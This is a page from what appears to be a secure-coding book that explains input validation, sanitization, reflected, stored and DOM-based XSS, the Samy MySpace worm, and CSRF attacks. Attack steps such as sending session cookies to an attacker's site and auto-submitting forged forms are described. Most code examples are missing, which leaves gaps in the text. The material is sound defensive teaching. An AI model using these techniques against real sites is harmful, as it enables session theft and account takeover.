Sharks in the Moat

Page 28

by Phil Martin

We haven’t even mentioned the possibility of the attacker using a tool such as Fiddler to craft every form tag - including HTTP headers - without using a browser. Lesson learned – NEVER TRUST THE CLIENT. Always, always, always implement server-side validation! I am routinely amazed at the number of ‘senior developers’ who fail to grasp this basic concept.

After discussing the how and where, let’s talk about what to validate. While any aspect of data is a candidate for input validation, at a minimum the following should be considered:

The type of data.

The range of allowed values.

The length of the data.

The format of the data.

If multiple data points are allowed, such as a multiple select list, if they are all allowed as a group.

If there are alternative representations of the data, or canonical forms.

Sanitization

When we convert data that could be dangerous into a form that is safe for processing and storage, we are sanitizing the data. This applies to both input and output.

We can use three different methods to sanitize data – stripping, substitution or literalization. For the following examples, let’s assume an attacker sends the following dangerous input data:

Stripping removes dangerous characters from a string of input data. When we strip dangerous characters such as ‘<>();/’, we wind up with:

which will not be executed.

With substitution we replace dangerous characters with a substitute that is not dangerous. In our example above, if we substitute HTML encoded characters for less than and greater than symbols, we wind up with:

This will also not be executed as it is not recognized as a script block. The most-oft used approaches to substitution involve two encoding schemes. HTML encoding converts characters to their HTML equivalent – this is the example we just covered. We can also use URL encoding that is used when converting textual URLs to a form that is safe to transmit over a network. For example, the character ‘/’ can mean something special to code that processes a URL, so all ‘/’ characters are instead converted to ‘%2f’. It is important to transform these alternative forms into the canonical form before performing validation.

Finally, we can use literalization to convert proper HTML to its textual representation. As an example, we can skip the innerHTML form and instead use the innerText form.

While sanitization techniques can render dangerous input impotent, it can also negatively impact the integrity of the data. For example, if we receive an input value of “Orielly’s Bucket” and perform HTML encoding substitution (“’”=”%27”) that results in “Orielly%27s”, which is then stored, when a user views this data element they will see the following:

Location: Orielly%27s Bucket

Which is hardly user-friendly. It can get even worse though. If we also encode suspect characters when outputting data to a browser, we will be guilty of double encoding the ‘%’ sign (“%”=”%25”), resulting in:

Location: Orielly%2527s Bucket

One solution to this problem is to encode data before storage, reverse the encoding upon retrieval, and use innerText to display the information in the browser:

Received: Orielly’s Bucket

Stored:Orielly%27s Bucket

Retrieved: Orielly’s Bucket

Browser: $(‘myDiv’).innerText = getLocationValue();

That’s a lot of work but saves us a world of hurt when we get hacked.

XSS

When I first ran across XSS, I had a very difficult time wrapping my mind around how such an attack works and the various flavors that are out there. So, we are going to take our time and describe how the attacks are carried out with examples to ensure you grasp both the power and danger of this specific attack vector. Cross-site scripting, or XSS, is based on the ability of an attacker to use a script as an input into a system, and somehow get the system to reflect that script back out such that it is executed in the browser. Some experts refer to this attack as a ‘1-2 punch’ since it really is comprised of two vulnerabilities – an injection flaw that allows a script block to be input into a system, and the resulting XSS weakness that allows the script block to be reflected back out to the browser. There are three different types of XSS:

Non-persisted or Reflected

Persistent or Stored

DOM-based

Let’s take them one at a time.

Non-persisted or Reflected XSS

In this most basic case, the system accepts the input script but does not store it in a database or other persistent repository. Instead, the system simply reflects the script right back to the browser. For example, if I were to type in the following URL...

http://www.vulnerablesite.com/foo

...and got back a web page that included the following HTML source code…

Unable to locate the page 'foo'.

...I could instead type in this URL…

http://www.vulnerablesite.com/

…resulting in the following HTML being reflected back from the server:

Unable to locate the page ''.

When the browser receives this page, it will immediately popup an alert that says ‘Hi!’. This example illustrates an injection flaw, where the system accepts an invalid URL and processes it, and a reflection vulnerability where the invalid information is reflected back to the browser in such a way that it is executed.

Now, how would an attacker use such an attack? It does no good for him to simply alter the URL in his own browser – he already has complete access to whatever is in the browser. Instead, an attacker will craft a URL exploiting the weakness, and trick other people into loading his URL into their own browser. This might include sending emails out hoping someone will click on the malicious link, or simply embedding the link on a trusted web site. As an example, suppose an attacker convinces cnn.com to show a link with the following URL:

http://www.vulnerablesite.com/

When the user clicks on the link, it will redirect the browser to the legitimate site – www.vulnerablesite.com in this example. The web server at this site will then send the script specified in the URL back to the browser where it is executed as we illustrated earlier. The browser will then load the cookie for www.vulnerablesite.com and send it to the attacker’s site. If the cookie contains a legitimate session ID or unencrypted sensitive information, then the attacker now has it!

Or, even simpler, perhaps the CNN website simply reflects a script that is executed without the user having to click a link. As soon as the page loads, the malicious script is executed. Now, how does the attacker get cnn.com to do that? He must execute the second type of XSS – persistent XSS.

Persistent or Stored XSS

In 2005, Samy Kamkur released an XSS worm called ‘Samy’ on the then-popular MySpace site. Within 20 hours it had propagated to over 1 million users, earning it the title of the fastest spreading virus of all-time, a statistic that still stands today. Fortunately, all the virus did was to display the text ‘but most of all, samy is my hero’ on each person’s public profile and then send Samy’s account a friend request. Here is the snippet of code Samy injected into the web site:

Figure 86: The Samy Virus

The exploit took advantage of a weakness allowing the attacker to get his script to be stored in the MySpace database, and then to be reflected back when someone’s profile was displayed. Because the offending script was persisted on the backend, it differs from simply being reflected. This type of approach requires the server application to accept input – usually in an INPU
T or TEXTAREA form field – and store it in a database without first sanitizing the content.

Returning to our previous example of stealing cookies by injecting an XSS script into cnn.com, the cnn.com web site would have to be vulnerable to some type of injection flaw which was then persisted. Here are the steps required to carry out that attack:

1) The attacker gains access to a cnn.com page that accepts user input – perhaps a mechanism allowing readers to comment on a story.

2) The attacker types in his malicious script as a comment and submits it.

3) The website does not sanitize the input and stores it in the backend database as a comment for the story.

4) An unsuspecting visitor reads the story, which is sent back to the browser along with all comments.

5) One of the comments contains the script, which executes as soon as the page is loaded.

In this scenario, the user doesn’t have to do anything but visit the page, and the attacker’s script is executed without the user’s knowledge.

DOM-based XSS

The third type of XSS attack is to modify the contents of the web page after it has been loaded from the server. While both non-persisted and persisted XSS attacks trick the server into emitting malicious code back to the browser, a DOM-based attack takes advantage of a weakness in the way a page is constructed.

For example, suppose that a vulnerable site had the following source code sent to the browser:

If we were to use the following URL:

The page would then call the malicious website and send the cookie for www.vulnerablesite.com. You might have noticed that this URL is the exact same URL we used for the reflected XSS attack. The difference is that because we used the ‘#’ in the URL, anything after that symbol is not sent to the server, and therefore the server has no chance to perform any type of sanitization or validation of input text. Whereas reflected XSS requires the server to emit our dangerous script back to the browser, a DOM-based vulnerability only requires the HTML page to be poorly written. Everything with a DOM-based attack happens in the browser, not the server. The delivery vehicle is the same as with a reflected XSS attack – get the user to somehow click on a malformed link. Amazingly, around 50% of all sites world-wide are vulnerable to such an attack.

Mitigating XSS Attacks

For both reflected and persisted XSS attacks, all user input should be sanitized before processing is carried out. All output back to the browser should be escaped. For example, when a user inserts a script tag into the URL, such as:

the offending URL should be escaped by replacing dangerous characters with their HTML-encoded equivalent. For example, all less-than and greater-than signs should be replaced with ‘<’ and ‘>’ respectively:

This will effectively render the dangerous script impotent. This type of sanitization should be carried out before data is persisted as well. Sanitization routines should employ a whitelist of acceptable characters instead of looking for known dangerous characters. All input must be fully decoded before validation occurs, as some types of encoding can hide the original content. Some servers provide a native capability to detect dangerous input, such as the validateRequest flag for .Net applications. At times, an attacker will attempt to upload HTML-based files with the hope of getting the server to display them for other users. To prevent this, servers should not allow the upload of any file with an HTM or HTML extension. Use secure server-side libraries such as Microsoft’s Anti-Cross Site Scripting, OWASP’s ESAPI Encoding module, Apache Wicket or the SAP Output Encoding frameworks.

If an application absolutely must generate content after being loaded into a browser, employ the innerText property of an HTML element instead of the innerHTML property. innerText will normally prevent execution of rogue content. Avoid use of capabilities such as ‘document.write’ and instead explicitly load dynamic content into existing DIV or SPAN tags using the innerText property.

A rather useless action that many sources will recommend is to disable scripting in the browser. While this technically is a great security mechanism, from a psychological acceptability standpoint few users will stand for this as it effectively rolls back the user experience to a pre-2000-year state. A better approach is to properly implement sanitization and validation controls instead of adopting such a nuclear option. The blast radius might very well include the loss of your job when users revolt!

If cookies retain sensitive information that is not used by browser code, it is a good idea to enable the HTTPOnly flag so that the cookie contents cannot be accessed by rogue XSS scripts. Note that not all browsers respect this flag.

In the event that a legacy or third-party web application cannot be updated due to the lack of source code or the cost involved, an application-layer firewall can help out. This is only a last-resort method, however.

CSRF

Any website that does not implement some form of session management is pretty much unusable if any sensitive data is to be accessed. For example, it is not reasonable to expect a user to provide their username and password for every single page request between the browser and server. The only legitimate answer is to implement some type of session token that is automatically passed from the browser to the server on every request. This token can be sent as part of the URL – which is NOT the recommended approach – or stored as a cookie, or even in HTML5 local storage. Cookies are sent with every HTTP request to the server, while script is required with HTML5 local storage to retrieve the token and send it programmatically to the server. By far the most common approach is to use a cookie to store the token, and that is the weakness that cross-site request forgery, or CSRF, takes advantage of.

CSRF is a huge concern and is consistently listed in both Top 10 OWASP and the CWE/SANS Top 25 vulnerabilities. This attack requires the user to already be authenticated into the vulnerable website using some type of pre-authorized manner that the attacker will not have direct access to. In other words, this attack depends on the user being able to visit the website and be automatically authenticated in some way without having to type in their credentials. This can happen in two ways – unexpired session tokens or a ‘remember me’ feature.

When an unexpired session token is stored in a cookie, every request between the browser and web server will include the cookie for that site. The majority of sites use a cookie to store a session token, and for two primary reasons – it is hidden from the user to discourage tampering, and it does not require the user to do anything special. Remember that a session token is just a string of clear text characters and should eventually expire.

When a ‘remember me’ feature is used, the actual username and password is stored – hopefully encrypted – in the cookie. This feature is normally used in-tandem with a session cookie. In this case though, when the session token expires, the site simply digs in and retrieves the credentials to create a brand-new session token – the user does not have to reauthenticate even when their session expires. While this is a great usability feature, it is an extremely poor security feature and should be aggressively avoided.

Now that we have setup the base requirements for CSRF, let’s see how it actually works. The first and most dangerous scenario, shown in Figure 87, only requires the visitor to visit a web page containing a malicious tag – the user does not have to take any action, and the attack is carried out without him or her even being aware it is going on. For our scenario, let’s assume the vulnerable web site allows the email address of record to be changed using a simple GET request:

Figure 87: CSRF Attack Requiring No User Action

Because the site cookie is automatically sent along with the request, the server will authorize the request based on the active session token and change the email address.

Now, let’s assume the victim visits the malicious website, which has the following tag embedded in the page:

Here, the tag no longer works, but if we can get a user to click a link, then we simply As soon as the user visits
the malicious web site, the user’s browser will attempt to load the image from vulnerablesite.com using a GET request. It doesn’t matter that an actual image is not being requested – as far as vulnerablesite.com is concerned, a browser just sent a GET request to change the email address of the current user. When the image tag executes the request, guess what is sent right along with it? You got it – the cookie with the unexpired session token. The server dutifully confirms that the token is valid and changes the email address for the user. All without the user or web server knowing something hinky is going on. Now how did the attacker get the user to visit their evil website? Usually through a phishing email containing a link, but he could also have embedded his link in an ad on a legitimate site, or perhaps posted the IMG tag in a comment or user post on a site the user frequents.

The next scenario uses the same tactic but instead tricks the user into clicking the link. For example, the malicious HTML might be:

This is exactly the same attack but does require the user to click on something.

Now, let’s suppose that the owner of the vulnerable site gets wind of these attacks, and decides to turn the GET request into a POST in order to defeat the attacker. While this definitely does increase the effort, it is not fool-proof. The third scenario shows how to get around such a problem.

create a POST form and submit it. For example, we can implement the following:

In fact, we can even use this code to automatically execute when the page is loaded, thereby removing the need for the user to take any action:

So, simply converting to a POST mechanism really doesn’t solve much. But it gets even worse. If we combine CSRF with XSS, the impact can be devastating. Recall that persisted XSS requires us to somehow get the server to store our malicious code and reflect it back out to victims. Well, CSRF is a great way to inject our XSS payload. In fact, XSS worms which replicate themselves across many users for a single site often use CSRF to perform the initial infection. So, we use CSRF as the vehicle to deliver the malicious XSS code and get it persisted on the vulnerable site. By using CSRF, we do not have to know any valid credentials. And, since CSRF requests are seen by the server as a legitimate request, they usually go unnoticed for a long time.

‹ Prev Next ›